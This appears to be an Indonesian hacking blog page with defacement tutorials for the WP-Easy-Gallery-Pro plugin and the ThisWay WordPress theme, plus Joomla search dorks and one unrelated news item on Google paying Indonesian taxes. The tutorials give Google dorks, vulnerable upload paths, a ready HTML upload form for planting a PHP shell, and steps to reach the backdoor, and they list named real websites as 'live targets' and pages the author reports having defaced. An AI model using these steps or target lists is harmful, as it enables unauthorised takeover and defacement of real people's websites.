-

Saturday 5 August 2017

Cara Deface Wp-Easy-Gallery-Pro With CSRF + Live Target

Selamat Siang gan hehehe ketemu lagi sama saya Admin yg paling kece& Tamvan wkwkkwkw :v
Oke Sekarang saya mau berbagi Tutorial Seperti Biasa Yaitu Wp-Easy-Gallery-Pro ya Walaupun ini termasuk POC Jadul apa salah Nya Kita Mengupas Lagi Lebih Dalam Biar Mendesah wkwkwk :v
Oke Langsung aja Agan Simak  ;)


Bahan :
-Dork      " /wp-content/plugins/wp-easy-gallery-pro/ "
-CSRF
-Kopi
-Internet
-Waktu
-Exploit    " /wp-content/plugins/wp-easy-gallery-pro/admin/php.php "
-Kesabaran <== ini nih Yg Paling Penting gan :v
-Live TARGET " http://tormoveis.com/ " <== Di mohon Jangan di rusak Gan

1.Masukkan Dorknya di Google .. Dork Bisa di Kembangin Lagi Ya Gan di Kasih Site,intext Dll Biar dapet yg masih Perawan :v

2.Setelah kira" Dapet Target yg Vuln Masukkan Exploit nya..

3.Apabila Vuln ada Tulisan {"error":"No files were uploaded."} Atau Blank... Apabila NotFound Dll Silahkan Next target aja Gan :v

4.Setelah Itu Agan Masukkan Target Beserta Exploit Tadi Ke dalam CSRF Nya Gan

CSRF:

<form enctype="multipart/form-data"
action="http://www.contohweb.com/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

5.Setelah itu CSRF nya di simpan dengan Extensi .html

6.Buka CSRF tadi lalu UPLOAD Shell Agan Apabila ada Tulisan Bla Bla Success Itu tandanya Shell agan Sudah Terupload

7.Buka Letak shell agan Upload Tadi di " /wp-content/uploads/shellagan.php " dan Terserah agan Mau di apakan :v Dosa di tanggung Sendiri gan :p

Nih Hasil Saya Gan : http://tormoveis.com/wp-content/uploads/aku.jpg
                              http://www.madcityblues.tv/wp-content/uploads/Screenshot_25.png.jpg
                              http://maherserv.com/wp-content/uploads/Screenshot_25.png.jpg


Sekian Tutorial kali ini Samapai Bertemu Kembali di Lain Waktu Gan Bye ;)


Mohon di Berikan Sumber Kalau Mau COPAS Gan :D

Cara Deface Wordpress ThisWay Arbitrary File Upload + Live Target

Oke Gan Selamat Datang Kembali di Blog JIC-Team hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut saja Simak Tutorial di bawah ya


Bahan :
1.DORK
2.Exploit
3.CSRF

Eksekusi Selanjutnya

1.Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com <= Bisa di kembangin Lagi Biar dapet yg FRESS Gan 

2.Lalu masukan exploit ini : "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"

- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3.Apabila keluar tulisan seperti ini {"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln Gan :v

4.Lalu pastekan script berikut di notepad, lalu save dengan ekstensi .html
script CSRF 

5.Nanti keluar result/tulisan seperti ini : {"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}

Bila tidak nongol tulisan kaya gitu, cari target lain

6.Akses shell backdoor kalian di
- http://www.target.com/wp-content/uploads/[tahun]/[bulan]/settingsimage_randomnameshell.php

Example :
- http://target.com/wp-content/uploads/2016/09/settingsimage_c99326667788.php

Nih mimin Kasih Live Target Gan .. Jangan di rusak Yak Live Target Nya :D

-http://www.jasminecastillo.com/
-http://thenineyard.com

Nih Juga Hasil Saya Gan :

http://h2ophotographics.com/list.htm
http://www.jasminecastillo.com/wp-content/uploads/2017/08/settingsimage_BDUV6XdGGHf35LVD.htm
 http://thenineyard.com/wp-content/uploads/2017/08/settingsimage_VCQZmDBNPVGRUlEk.htm
http://www.beautyandhair.com.mx/wp-content/uploads/2017/08/settingsimage_EG0d1lfMcSefPM2K.htm


Sekian Tutorial kali ini Gan Semoga bermanfaat ^_^... Bagi Yg Mau CopAS Mohon Di Kasih SUmber nya Gan Trimakasih ;)

By ./51N1CH1
 

Tuesday 31 January 2017

Dork Com User Fress 2017

intext:Joomla!® ist freie, unter der GNU/GPL-Lizenz, veröffentlichte Software
intext:+00:00 12 01 2017 Joomla! 1.7 Open Source
intext:Bitte einen gültigen Benutzernamen und Passwort eingeben, um Zugriff zur Administration zu erhalten. 
intext:powered by Kreative Lab
"Design by 2D media"

Tuesday 17 January 2017

Google Harus bayar Pajak?




Pemerintah Menyatakan akan segera Menyelesaikan pengecekan/pemeriksaan terhadap perusahaan raksasa luar negeri yaitu Google , Setelah pengecekan/pemeriksaan selesai pemerintah akan mewajibkan Perusahan raksasa Google untuk membayar Pajak Mulai dari Tahun ini hingga seterusnya .

Direktur Jenderal Pajak Kementerian Keuangan (Kemenkeu) Ken Dwijugeasteadi mengatakan Direktorat Jenderal Pajak (DJP) sedang melakukan pengecekan/pemeriksaan terhadap pajak Google.

"(Google bayar pajak tahun ini?)Iya pokoknya selesai pemeriksaan. Biasa kalian sudah tahu mudah-mudahan dengan adanya penguatan tadi kita sudah sangat bersatu," kata dia di sela acara Rapat Pimpinan Nasional X DJP 2016 di Kantor Pusat DJP (7/11/2016).

Dia menerangkan, dalam pengecekan/pemeriksaan terdapat proses closing. Kedua belah pihak akan menyepakati besaran pajak yang dibayarkan.

"Di dalam pengecekan/pemeriksaan itu ada namanya closing, closing itu adalah pernyataan kedua belah pihak misalnya Saya mengoreksi 10 oh nggak, nggak setuju, WP-nya ngomong ini ada 8 ya silahkan," jelas dia.

Dia berharap, proses closing ini akan segera selesai. Namun demikian, dia enggan menyebut berapa besaran pajak yang dibayarkan perusahaan tersebut. "Itu rahasia. Tidak boleh dong," ujar dia.

Thursday 8 December 2016

Live Target Joomla Com User

Halo Guys apa kabar hehe Udah Lama Nih Gak Update Live Target Deface Joomla Yaitu Com User oke Langsung aja Di coba Guys ;) JaNgan di rusak ya Live Target Nya ,, Hanya Buat Media Pembelajaran saja

LIVE Target :

- http://sercorp.cl/
-http://lighttouchhr.co.uk/

xixixi Knapa Kok cuman dikit Karna Mimin Males Save Web Yg Vuln Com User ...

Older Posts